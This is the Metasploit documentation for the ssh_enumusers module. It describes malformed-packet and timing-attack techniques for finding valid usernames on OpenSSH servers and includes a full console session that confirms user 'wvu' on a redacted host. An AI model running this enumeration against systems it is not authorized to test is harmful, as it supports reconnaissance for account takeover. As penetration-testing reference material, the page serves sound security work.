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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/scanner/ssh/
Views: 1904


This module uses a malformed packet or timing attack to enumerate users on an OpenSSH server.

Testing note: invalid users were logged, while valid users were not. YMMV.


Malformed Packet

The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST packet using public key authentication (must be enabled) to enumerate users.

Timing Attack

On some versions of OpenSSH under some configurations, OpenSSH will return a "permission denied" error for an invalid user faster than for a valid user, creating an opportunity for a timing attack to enumerate users.



Single username to test (username spray).


File containing usernames, one per line.


Amount of seconds needed before a user is considered found (timing attack only).


Check for false positives (random username).


msf5 > use auxiliary/scanner/ssh/ssh_enumusers msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted] rhosts => [redacted] msf5 auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users [*] exec: echo $'wvu\nbcook' > users msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users user_file => users msf5 auxiliary(scanner/ssh/ssh_enumusers) > set verbose true verbose => true msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using malformed packet technique [*] [redacted]:22 - SSH - Starting scan [+] [redacted]:22 - SSH - User 'wvu' found [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack action => Timing Attack msf5 auxiliary(scanner/ssh/ssh_enumusers) > run [*] [redacted]:22 - SSH - Using timing attack technique [*] [redacted]:22 - SSH - Starting scan [+] [redacted]:22 - SSH - User 'wvu' found [-] [redacted]:22 - SSH - User 'bcook' not found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/ssh/ssh_enumusers) > creds Credentials =========== host origin service public private realm private_type ---- ------ ------- ------ ------- ----- ------------ [redacted] [redacted] 22/tcp (ssh) wvu msf5 auxiliary(scanner/ssh/ssh_enumusers) >